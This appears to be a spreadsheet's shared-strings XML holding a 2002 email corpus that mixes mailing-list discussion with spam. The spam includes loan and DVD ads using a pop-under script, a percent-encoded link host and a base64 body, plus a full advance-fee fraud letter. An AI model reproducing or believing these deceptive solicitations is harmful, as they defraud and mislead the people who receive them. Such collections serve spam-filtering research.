       &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" cellpadding=3D"=
 0" bgcolor=3D"#FFCC00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%"&gt;
             &lt;p align=3D"center"&gt;&lt;font face=3D"Times New Roman" color=3D"#0=
 00080" size=3D"6"&gt;&lt;b&gt;Your
             Price- $29.99&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" cellpadding=3D"=
 0" bgcolor=3D"#800000"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align=3D"center"&gt;&lt;center&gt;&lt;a href=3D"http://abel.math.umu.seq64438key=3D=
 9658952107164438index=3DA21r7P6qW7164438.53342402@www.usavemore.net/remove=
 "&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt;Click
 here&lt;/font&gt;&lt;/a&gt;&lt;font face=3D"Times New Roman" size=3D"3"&gt; to unsubscribe f=
 rom these
 mailings.&lt;/font&gt;&lt;/center&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Robbie Williams signs 80m deal
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,8,215/
 Date: 2002-10-03T04:20:59+01:00
 *Arts:* Robbie Williams has become one of the highest paid singers in the 
 world.
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Wed, 31 Jul 2002 15:13:23 +0100
   | From: Ronan Cunniffe &lt;ronan@cunniffe.net&gt;
   | 
   | Um, my test was to tee to a fifo I didn't read from... resulting
   | in the other reader hanging around forever.... not realising that
   | never-opened-for-reading and opened-and-later-closed might be
   | different.
  ah!  yes!  this is one of those gotchas everyone stumbles
  over.  the writer of a never-opened-for-reading pipe will
  quickly block (as soon as the pipe's limited buffer fills
  up).  but the writer of opened-and-later-closed pipe gets
  an EPIPE error (and the usually-terminal SIGPIPE signal).
  the typical stumble is someone creates an anonymous pipe
  with pipe(2), but forgets to close(2) the reader's fd in
  the writer-process (or visa-versa) .... and then wonders
  why the real reader never sees an EOF and/or the writer
  is never gets an EPIPE/SIGPIPE.  various FAQs and many
  books probably discuss this topic in depth to the death.
   |             Sensible behaviour has now been observed.
  good!  and good luck.
 cheers,
 	-blf-
 --
 «How many surrealists does it take to    |  Brian Foster    Dublin, Ireland
  change a lightbulb?  Three.  One calms  |  e-mail: blf@utvinternet.ie
  the warthog, and two fill the bathtub   |  mobile: (+353 or 0)86 854 9268
  with brightly-coloured machine tools.»  |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</si>
  <si>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Subject: Ouch...
</t>
  </si>
  <si>
    <t xml:space="preserve">Shouldn't a politician know not to tell the truth? Odds he's impeached by
 next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]
 Ouch. Ouch. Ouch.
 ------------
 Get Sexier, Keep Husbands, Mayor Tells Wives
 Wed Sep 4, 9:14 AM ET
 MISSAGLIA, Italy (Reuters) - Husband's eyes wandering? Make yourself sexier.
 At least that's the solution proposed by an Italian mayor -- and a woman
 mayor at that.
 Wives in the northern town of Missaglia had complained to mayor Marta
 Casiraghi about a young woman who sunbathed topless on her terrace.
 They complained that the men in the town of some 7,000 people were spending
 too much time ogling, so they asked Casiraghi to order the woman to put her
 clothes back on.
 But the mayor, far from sympathizing, told the wives to get sexy if they
 wanted to keep their men. "The girl was very pretty and was soaking up some
 sun. Topless sunbathing is largely tolerated and widespread nowadays.
 There's nothing we can do," Casiraghi told Il Nuovo, a web-based newspaper.
 "Instead, I'd advise the wives to play their rival at her own game -- make
 themselves more beautiful."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Online Approval for $5000 Now
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Free Card Search&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;&lt;BODY BGCOLOR="#000000"&gt;&lt;div align="center"&gt;
 &lt;a href="http://mbf.%61%66%66%69%6c%69%61%74%65%6e%65%74%74%2e%63%6f%6d/fcard/"&gt;
 &lt;IMG SRC="http://mbf.%61%66%66%69%6c%69%61%74%65%6e%65%74%74%2e%63%6f%6d/fcard/ad/new_fcard.jpg" WIDTH=523 HEIGHT=373 border="0"&gt;&lt;/a&gt; 
 &lt;/div&gt;&lt;TABLE WIDTH=523 BORDER=0 CELLPADDING=0 CELLSPACING=0 align="center"&gt;
 &lt;TR&gt;&lt;td colspan=7 align=left&gt;&lt;br&gt;&lt;font color="white" size="1" face="arial"&gt;
 Sincerely,&lt;BR&gt;&lt;B&gt;Your New Offers Staff&lt;/B&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;FONT SIZE="-2"&gt;&lt;A HREF="mailto:montage@btamail.net.cn?subject=Remove"&gt;Remove&lt;/A&gt;&lt;/FONT&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_550_78375233847568
 Content-Type: text/plain;
 	charset=iso-8859-1
 Content-Transfer-Encoding: Quoted-Printable
 We will help you get the mortgage loan you want! 
 Only takes 2 minutes to fill out our form. 
 http://208.155.108.170/
 Whether a new home loan is what you seek or to refinance your current home =
 loan
 at a lower interest rate and payment, we can help!
 Mortgage rates haven't been this low in the last 12 months, take action now!
 Refinance your home with us and include all of those pesky credit card bills =
 or
 use the extra cash for that pool you've always wanted... 
 Where others says NO, we say YES!!!
 Even if you have been turned down elsewhere, we can help! 
 Easy terms! Our mortgage referral service combines the
 highest quality loans with most economical rates and the easiest =
 qualification!
 Click Here to fill out our form. 
 http://208.155.108.170/
 ------=_NextPart_550_78375233847568
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Mortgage companies make you wait&lt;/TITLE&gt;
 &lt;META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;script&gt;
 win=3Dwindow.open("http://www.businessopp2002.com/moneyestate5/")
 win.blur()
 window.focus()
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;BODY bgProperties=3Dfixed leftMargin=3D10 topMargin=3D10 marginwidth=3D"0" =
 marginheight=3D"0" NOSEND=3D"1"&gt;
 &lt;BLOCKQUOTE dir=3Dltr style=3D"PADDING-LEFT: 0px; MARGIN-LEFT: 5px; BORDER-LEFT: =
 #0000af 5px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV align=3Dcenter&gt;
   &lt;CENTER&gt;
   &lt;TABLE width=3D540 height=3D1 cellSpacing=3D1 border=3D0&gt;
     &lt;TBODY&gt;
     &lt;TR&gt;&lt;TD colspan=3D2&gt;
       &lt;P align=3Dcenter&gt;&lt;/FONT&gt;&lt;BIG&gt;&lt;STRONG&gt;&lt;FONT face=3DTahoma =
 color=3D#008000&gt;Mortgage companies make you wait...They Demand to Interview you..=
 They &lt;U&gt;Intimidate&lt;/U&gt; you...They &lt;U&gt;Humiliate&lt;/U&gt; you...And All of That is =
 While They Decide If They Even Want to Do Business With You...=
 &lt;/STRONG&gt;&lt;/BIG&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT color=3D#000000 size=3D5&gt;&lt;STRONG&gt;We Turn the Tables =
 on Them...&lt;BR&gt;Now, You're In Charge&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT color=3D#000000&gt;&lt;SMALL&gt;&lt;B&gt;Just Fill Out Our Simple =
 Form and They Will Have to Compete For Your Business...&lt;/B&gt;&lt;/SMALL&gt;&lt;BR&gt;&lt;BR&gt;&lt;A =
 href=3D"http://208.155.108.170/" Target=3D"_NEW"&gt;&lt;BIG&gt;&lt;BIG&gt;&lt;STRONG&gt;CLICK HERE FOR =
 THE FORM&lt;/STRONG&gt;&lt;/BIG&gt;&lt;/BIG&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;BR&gt;
     &lt;/TD&gt;&lt;/TR&gt;
     &lt;TR&gt;
       &lt;TD vAlign=3Dcenter width=3D50%&gt;&lt;STRONG&gt;&lt;FONT size=3D2 face=3DTahoma =
 color=3D#000000&gt;We have hundreds of loan programs, including:&lt;/FONT&gt;&lt;/STRONG&gt;
           &lt;B&gt;&lt;FONT size=3D2 face=3DTahoma color=3D#008000&gt;
             &lt;UL&gt;
               &lt;LI&gt;Purchase Loans
               &lt;LI&gt;Refinance
               &lt;LI&gt;Debt Consolidation
               &lt;LI&gt;Home Improvement
               &lt;LI&gt;Second Mortgages
               &lt;LI&gt;No Income Verification
             &lt;/UL&gt;&lt;/FONT&gt;&lt;/B&gt;
        &lt;/TD&gt;
        &lt;TD width=3D50% valign=3Dtop&gt;
 		 &lt;BLOCKQUOTE dir=3Dltr style=3D"PADDING-LEFT: 25px; MARGIN-LEFT: 0px; =
 BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
 		 &lt;DIV align=3Dcenter&gt;&lt;CENTER&gt;&lt;P align=3Djustify&gt;You can save &lt;I&gt;&lt;B&gt;&lt;U&gt;Thousands =
 Of Dollars&lt;/U&gt;&lt;/B&gt;&lt;/I&gt; over the course of your loan with just a 1/4 of 1% Drop =
 in your rate!&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/DIV&gt;
        &lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt;
 	  &lt;TD colspan=3D2&gt;
 	    &lt;BR&gt;&lt;P align=3Dcenter&gt;&lt;A href=3D"http://208.155.108.170/" =
 Target=3D"_NEW"&gt;&lt;FONT face=3DTahoma color=3D#0000ff&gt;&lt;BIG&gt;&lt;BIG&gt;&lt;STRONG&gt;CLICK HERE FOR =
 THE FORM&lt;/STRONG&gt;&lt;/BIG&gt;&lt;/BIG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
         &lt;P align=3Dcenter&gt;&lt;FONT face=3DTahoma size=3D3 color=3D#000000&gt;&lt;STRONG&gt;You =
 will often be contacted with an offer the&lt;br&gt;very same day you fill out the =
 form!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
   &lt;/TABLE&gt;
   &lt;P align=3Dcenter&gt;&lt;A HREF=3D"http://208.155.108.170/remove.html" =
 Target=3D"_NEW"&gt;&lt;FONT face=3DTahoma size=3D2 color=3D#000000&gt;Remove&lt;/FONT&gt;&lt;/A&gt;
 &lt;/HTML&gt;
 ------=_NextPart_550_78375233847568--
</t>
  </si>
  <si>
    <t xml:space="preserve">Craig R.Hughes wrote:
 &gt; I was thinking you could easily create a spamtrap which you subscribe to 
 &gt; lots of legitimate nonspam mailing lists, plus you also spread the email 
 &gt; address around and get it in the hands of lots of spammers so it ends up 
 &gt; receiving large quantities of both spam and nonspam, then you have it 
 &gt; apply the algorithm above to the incoming mail stream.  So it could be 
 &gt; thousands of actual real, different, emails per day.  The "very high 
 &gt; rate triggers alarms" thing is certainly something which would be 
 &gt; possible to check for, but there may be legitimate ways to exhibit this 
 &gt; behavior -- can't think of one right now but "AOL proxy server" springs 
 &gt; to mind as an example from another domain.
 If there is a maximum trust value (if trust is some sort of percentage
 for instance), and if it isn't impossible to reach it, that would 
 prevent too few people to get too much of an avantage. My guess is if 1% 
 of razor users can reach this limit (or be near enough), spammers won't 
 be able to cheat just by building up their trust, they would need a fair 
 amount of fake users too.
 Now, for the "fair amount of fake users", spammers don't have access to 
 many set of network classes. So they would need a bunch of users coming 
 from the same set of ips. If the razor servers see 100 people on a class 
 C network (253 ips) reporting 10000 emails a day, something wrong is 
 going on. This could also trigger alarms.
 As for legitimate proxies and the like, 1) a proxy should not report any
 thing (spam should be reported by hand, not automatically), 2) there may 
 be a way to have exception (IBM networks would have lots of users from 
 the same set of ips but no likely spammers, so no alarm would trigger 
 for their network, or better the alarm would be less sensitive). AOL 
 could still give trouble though but even then, for one particular phone 
 line/cable, the set of ip is probably quite small even less than a class 
 C (using network subclassing). The spammers could still try to have 
 several connections at different locations, but that increases their 
 cost and so is not so much interesting.
 	Jehan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</si>
  <si>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[use Perl] Headlines for 2002-07-23
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 This week on perl5-porters (15-21 July 2002)
     posted by rafael on Monday July 22, @03:21 (summaries)
     http://use.perl.org/article.pl?sid=02/07/22/0725254
 LAN Party at OSCON
     posted by ziggy on Monday July 22, @13:06 (events)
     http://use.perl.org/article.pl?sid=02/07/22/179214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</si>
  <si>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VoIP tip: Troubleshooting voice
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Animal attraction for sale
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/england/2515127.stm
 A bizarre collection of stuffed animals could fetch up to 2m when it is
 sold by a Cornwall museum.
 The Museum of Curiosities is home to a menagerie of 10,000 Victorian stuffed
 animals.
 The museum, next to the Jamaica Inn on Bodmin Moor, gets about 30,000
 visitors a year.
 But now the inn's owner Kevin Moore has decided to sell.
 Stuffed frogs are for sale
 Mr Moore said: "It was very fashionable to have taxidermy on your
 mantlepiece in Victorian times, but it is not really in favour now."
 Nevertheless, figures of up to 2m for the collection have been discussed.
 The museum was opened in 1861 by taxidermist Walter Potter.
 Tableaux include a kittens tea party, cricket-playing guinea pigs and
 swinging frogs.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Share the magic of Harry Potter with Yahoo! Messenger
 http://us.click.yahoo.com/4Q_cgB/JmBFAA/46VHAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EFnet #fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Someone has taken it.  Mostly newtel users.  I think we can take the.
 C
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Content management for MP3s
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear flatware,
 I'm about to undertake a massive project to index/catalog well over one 
 thousand CDs that have been ripped to MP3 and set up a server to stream 
 them to different rooms in the house. (Yes, I own them all, no I'm not 
 broadcasting them to the 'net.) Can anyone give me some recommendations 
 as to what (free? opensource?) software is best suited for this task? I 
 know there are a few FoRKs out there who have tackled this problem before...
 I'd like to be able to dynamically generate play lists from queries like 
 "Jazz released between 1950 and 1960" or "Artist such and such between 
 these dates" or "Just these artists" or "Just this genre" - you get the 
 idea. In addition to having multiple streams that I can tune in to (a la 
 DMX), I'd like to be able to browse the database through a web interface 
 from other computers in the house and pull specific music down to 
 wherever I am.
 Thanks,
 Elias
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Curried radiation burns
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85537496
 Date: Not supplied
 Curcumin, the chemical that makes curry yellow, turns out to be a good compound 
 for treating radiation burns resulting from cancer therapy. Link[1] Discuss[2] 
 (_Thanks, Cheryl!_)
 [1] http://www.alertnet.org/thenews/newsdesk/N07347915
 [2] http://www.quicktopic.com/boing/H/THKNJnrnHdDd
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Go get em gadgets of 2002 4497VLNz2--9
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00E4_17A73C2D.E7104E07
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SGVyZSdzIHRoZSBob3R0ZXN0IHRoaW5nIGluIERWRHMuIE5vdyB5b3UgY2Fu
 IG1ha2UgYSBwZXJzb25hbCBiYWNrdXANCmNvcHkgb2YgYSBEVkQgcmlnaHQg
 b250byBDRC1SLiAgT3VyICJIb3QiIG5ldyBzb2Z0d2FyZSBlYXNpbHkgdGFr
 ZXMgeW91IHRocm91Z2gNCnRoZSBzdGVwcyB0byBtYWtlIGEgY29weSBvZiB5
 b3VyIG93biBEVkRzLg0KDQpOT1cgSU5DTFVERUQgRk9SIEZSRUUhIENvcHkg
 UExBWVNUQVRJT04sIE1VU0lDL01QM3MgYW5kIGFsbCBTb2Z0d2FyZS4NCg0K
 LSBTdGVwIGJ5IFN0ZXAgSW50ZXJhY3RpdmUgSW5zdHJ1Y3Rpb25zIA0KLSBB
 bGwgU29mdHdhcmUgVG9vbHMgSW5jbHVkZWQgT24gQ0QgDQotIE5vIERWRCBC
 dXJuZXIgUmVxdWlyZWQgDQotIEZSRUUgTGl2ZSBUZWNobmljYWwgU3VwcG9y
 dCANCi0gMzAgRGF5IFJpc2sgRnJlZSBUcmlhbCBBdmFpbGFibGUgDQotIEZS
 RUUgRHZkIE1vdmllIG9mIHlvdXIgY2hvaWNlIChMSU1JVEVEIFRJTUUgT0ZG
 RVIhKQ0KDQpXZSBoYXZlIEFsbCB0aGUgc29mdHdhcmUgeW91IG5lZWQgdG8g
 Q09QWSB5b3VyIG93biBEVkQgTW92aWVzLg0KDQpodHRwOi8vZHZkLnNwZWNp
 YWxkaXNjb3VudHM0dS5jb20vDQorKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrDQpUaGlzIGVtYWlsIGhhcyBiZWVuIHNjcmVlbmVkIGFuZCBmaWx0
 ZXJlZCBieSBvdXIgaW4gaG91c2UgIiJPUFQtT1VUIiIgc3lzdGVtIGluIA0K
 Y29tcGxpYW5jZSB3aXRoIHN0YXRlIGxhd3MuIElmIHlvdSB3aXNoIHRvICJP
 UFQtT1VUIiBmcm9tIHRoaXMgbWFpbGluZyBhcyB3ZWxsIA0KYXMgdGhlIGxp
 c3RzIG9mIHRob3VzYW5kcyAgb2Ygb3RoZXIgZW1haWwgcHJvdmlkZXJzIHBs
 ZWFzZSB2aXNpdCAgDQoNCmh0dHA6Ly9kdmQuc3BlY2lhbGRpc2NvdW50czR1
 LmNvbS9vcHRvdXRkLmh0bWwNCisrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysNCg0KOTY1OXNoUGE1LTgyNUNob3k3NzMySUx2bzItODg5YWd1STEy
 MjZTSmRNMS00NjllT1N6NDMyMlNwVXcyLWw1Nw0KNzQyNERhZ2w3LTA5NGZn
 d3IwODk3Z1FPSDItbDI1
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Why not upgrade to 2.40 today? (was: Re: [Fwd: Re: [Razor-users] can't find Razor/Client.pm])
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 24 July 2002 01:13 CET Theo Van Dinter wrote:
 &gt; On Tue, Jul 23, 2002 at 03:55:35PM -0700, Kevin Gagel wrote:
 &gt; &gt; I'm thinking of following this advise too. Is there a good reason that
 &gt; &gt; I should not upgrad to the 2.40 at this time?
 &gt;
 &gt; Unless you feel like doing some development, the answer is: it's not
 &gt; released and is considered "use at your own risk".   :)
 And maybe because there isn't an official 2.40 yet. It's 2.40-cvs and 
 changes from day to day. Or, to cite the page [1]: "these are built nightly 
 from CVS. They may be unstable!". One and a half good reason :o)
 Malte
 [1]http://spamassassin.org/downloads.html
 -- 
 -- Coding is art.
 --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</si>
  <si>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Kate P Looney wrote:
 &gt; Vendors wrote their own wierd-ass installers &amp; config tools to lock
 &gt; people to their OS, they added all sorts of functionality that was not
 &gt; availible to other OSes to make themselves different from the competition
 I think the words you are looking for are "competitive advantage" or
 "differentiation".
 Since most Linux vendors are businesses, they need to make money to
 survive[1]. To make money they need to sell products. To ensure they sell
 their product, they must provide something that other vendors do not.
 The down side is that this produces many variations of the same product. The
 benefit of open source is that there is a common standard which everyone can
 share. (The up side is that the competition drives the different
 organisations to constantly improve their product offering[2].)
 So unlike SunOS vs AIX vs HPUX vs Tru64, where the API's and available
 functionality were often starkly different, Linux distributions are mostly
 the same.
 While I may have to look in /var/named on Red Hat, and /etc/bind on Debian,
 the binaries are basically the same, as are the man pages. In most cases,
 doing a "man named" will reveal the compiled location of the config files.
 So long as this is understood, it is easy enough to administer most Linux
 distributions.
 I expect that as companies and public sector organisations begin to
 understand the open source paradigm, you will find even more distributions
 appearing. The reason I believe this is that deriving a new distribution
 from, say, Debian requires comparatively little effort. I would see this
 requiring slightly more effort than the amount of time many enterprise
 admins spend trying to customise the desktops, screen savers and software
 distribution mechanisms of their own organisations.
 IMHO, as always...
 - Matthew
 [1] Depending on your world view, this may be rephrased as "they need to
 make oodles of profits and screw the little man to survive." This discussion
 is beyond the scope of this list. :)
 [2] The often overlooked problem with competition is that it weakens the
 "combatants", leaving the field open for a less powerful force to take over
 and entrench its position (in this case I would be referring to Microsoft).
 However, I do not believe this will effect the Linux movement as all the
 vendors are obliged to work together to a great degree, thanks to the GPL.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</si>
  <si>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Subject: [SACVS] CVS: spamassassin/masses parse-rules-for-masses,1.1.2.2,1.1.2.3
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/masses
 In directory usw-pr-cvs1:/tmp/cvs-serv24879
 Modified Files:
       Tag: b2_4_0
 	parse-rules-for-masses 
 Log Message:
 fix for bug 784
 Index: parse-rules-for-masses
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/masses/parse-rules-for-masses,v
 retrieving revision 1.1.2.2
 retrieving revision 1.1.2.3
 diff -b -w -u -d -r1.1.2.2 -r1.1.2.3
 --- parse-rules-for-masses	28 Aug 2002 13:49:51 -0000	1.1.2.2
 +++ parse-rules-for-masses	28 Aug 2002 22:08:35 -0000	1.1.2.3
 @@ -28,6 +28,7 @@
  if (!defined $outputfile) {
    $outputfile = "./tmp/rules.pl";
 +  mkdir ("tmp", 0755);
  }
  my $rules = { };
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IRR] Klez: The Virus That  Won't Die
</t>
  </si>
  <si>
    <t xml:space="preserve">Klez: The Virus That Won't Die
 Already the most prolific virus ever, Klez continues to wreak havoc.
 Andrew Brandt
 &gt;&gt;From the September 2002 issue of PC World magazine
 Posted Thursday, August 01, 2002
 The Klez worm is approaching its seventh month of wriggling across 
 the Web, making it one of the most persistent viruses ever. And 
 experts warn that it may be a harbinger of new viruses that use a 
 combination of pernicious approaches to go from PC to PC.
 Antivirus software makers Symantec and McAfee both report more than 
 2000 new infections daily, with no sign of letup at press time. The 
 British security firm MessageLabs estimates that 1 in every 300 
 e-mail messages holds a variation of the Klez virus, and says that 
 Klez has already surpassed last summer's SirCam as the most prolific 
 virus ever.
 And some newer Klez variants aren't merely nuisances--they can carry 
 other viruses in them that corrupt your data.
 ...
 http://www.pcworld.com/news/article/0,aid,103259,00.asp
 _______________________________________________
 Irregulars mailing list
 Irregulars@tb.tf
 http://tb.tf/mailman/listinfo/irregulars
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] 2.40: ready for release?
</t>
  </si>
  <si>
    <t xml:space="preserve">OK guys -- I reckon it's now Good Enough, modulo some minor score
 tweaking, or commenting of some more broken/high-FP-ing rules.
 What do you all think?  are we ready to go?  anyone run into any trouble
 with the new autoconf code, or found a bug from the merge of that spamc
 BSMTP-support patch?
 I expect there *will* be a 2.41 BTW.
 --j.
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-devel mailing list
 Spamassassin-devel@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: bank inheritance
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Thema Ordi
 Tel:27 83 6919246
 othema2002@37.com  
 JOHANNESBURG, SOUTH 
 AFRICA. 
 ATTN: PRESIDENT/C.E.O. 
 DEAR SIR, 
 I AM MR. 
 Thema Ordi, MANAGER OF BILLS/EXCHANGE AT THE FOREIGN REMITTANCE 
 DEPARTMENT OF ABSA BANK LIMITED. IN MY DEPARTMENT, WE DISCOVERED AN 
 ABANDONED SUM OF US$12.5,000,000 (Twelve POINT FIVE MILLION US 
 DOLLARS ONLY) IN AN ACCOUNT THAT BELONGED TO ONE OF OUR FOREIGN CUSTOMERS WHO 
 DIED ALONG WITH HIS ENTIRE FAMILY ON NOVEMBER 1994 IN A GHASTLY PLANE 
 CRASH. SINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING 
 HIS NEXT-OF-KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT 
 RELEASE IT UNLESS SOMEBODY APPLIED FOR IT AS NEXT-OF-KIN, OR RELATION TO 
 THE DECEASED AS INDICATED IN OUR BANKING GUIDELINES. UNFORTUNATELY, 
 NOBODY HAS COME FOWARD TO CLAIM THIS MONEY. 
 IT IS BASED ON THIS THAT SOME OFFICIALS IN MY DEPARTEMENT AND I HAVE 
 DECIDED TO ESTABLISH A CORDIAL BUSINESS RELATIONSHIP WITH YOU, HENCE 
 MY CONTACTING YOU. WE WANT YOU TO PRESENT YOURSELF AS THE NEXT-OF-KIN 
 OR RELATION OF THE DECEASED SO THAT THE FUND CAN BE REMITTED INTO YOUR 
 ACCOUNT. 
 MOREOVER, WE DO NOT WANT THE MONEY TO GO INTO THE GOVERNMENT ACCOUNT 
 AS UNCLAIMED BILL. THE BANKING LAW AND GUIDELINES HERE STIPULATE THAT 
 ANY ACCOUNT ABANDONED OR IS DORMANT FOR A PERIOD OF YEARS IS DEEMED 
 CLOSED AND ALL MONEY CONTAINED THEREIN FORFEITED TO THE GOVERNMENT 
 TREASURY ACCOUNT. 
 NOW IT IS BEING SPECULATED THAT THE ABOVE SUM WILL BE TRANSFERED INTO 
 THE GOVERNMENT ACCOUNT AS AN UNCLAIMED FUND ON OR BEFORE DECEMBER 
 2002. THE REASON FOR REQUESTING YOU TO PRESENT YOURSELF AS NEXT-OF-KIN 
 IS OCCASIONED BY THE FACT THAT THE DECEASED (CUSTOMER) WAS A 
 FOREIGNER. 
 THE MODE OF SHARING AFTER A SUCCESSFUL TRANSFER OF THE MONEY INTO YOUR 
 ACCOUNT: 60% TO MY COLLEAGUES AND I; FOR THE ROLE YOU WILL BE EXPECTED 
 TO PLAY IN THIS DEAL, WE HAVE AGREED TO GIVE YOU THIRTY PERCENT (30%) 
 OF THE TOTAL SUM, AND 10% FOR THE EXPENSES WE ARE GOING TO ENCOUNTER BY 
 THE TWO PARTIES AT THE COURSE OF THIS TRANSACTION.THEREFORE YOU ARE 
 EXPECTED TO REPLY THIS LETTER INDICATING YOUR READINESS AND INTEREST TO 
 PARTICIPATTE IN THIS BUSINESS. 
 AFTER RECEIVING YOUR REPLY, YOU WILL BE COMMUNICATED TO WITH THE EXACT 
 STEPS TO TAKE. 
 I EXPECT YOUR URGENT RESPONSE EITHER BY EMAIL TO :othema2002@37.com    
  TO ENABLE US CONCLUDE THIS TRANSACTION ON YOUR REPLY I SHALL CALL YOU AND GIVE 
 YOU MY PHONE NUMBER FOR SECURITY REASONS.
 URGENTLY. 
 PLEASE TREAT THIS BUSINESS PROPOSAL AS STRICTLY CONFIDENTIAL FOR 
 SECURITY REASONS. 
 KIND PERSONAL REGARDS, 
 Thema Ordi
 Tel:27 83 6919246
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I am the new #2 [Re: USA USA ...]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Yes, and the working class deserves what it gets, ...
 Careful now, you're talking about
 most (80%) of the country.
 (although perhaps it is true that in
 a democracy, the people wind up with
 the government which they deserve)
 &gt; ... I grew up in as abject a poverty as you can find in the US ...
 ... and there is a large excluded middle
 between those "in poverty" and those who
 are more affluent than "working class".
 I don't know what poverty officially is,
 but from a CA perspective, $15k income is
 not going to go far.  At current interest
 rates, one would probably want somewhere
 around $500k* wealth to throw that amount,
 which pretty much limits the non-working
 class to a small, single-digit percentage
 of households.  (how much overlap do we
 have with the retirement cohort here?)
 The 2000 numbers pretty much confirm it:
 &lt;http://ferret.bls.census.gov/macro/032001/hhinc/new06_000.htm&gt;
 shows that the top 5% of incomes are mostly
 two+-earner households, and the zero-earner 
 households are rare above median incomes.
 We are the workers' paradise.
 The census figured $18k as the cutoff for
 lowest 5th, so with that as a poverty line,
 the percentages break down as follows:
 work\pov.  yes  no
 yes        9    72
 no        11     8
 -Dave
 :::::::::::
 * perhaps that's not even enough:
 "[Irvine] "Everyone has to take a job sometime" / NH3"
 &lt;http://www.xent.com/FoRK-archive/july99/0711.html&gt;
 (1998 wealth data was supposedly released
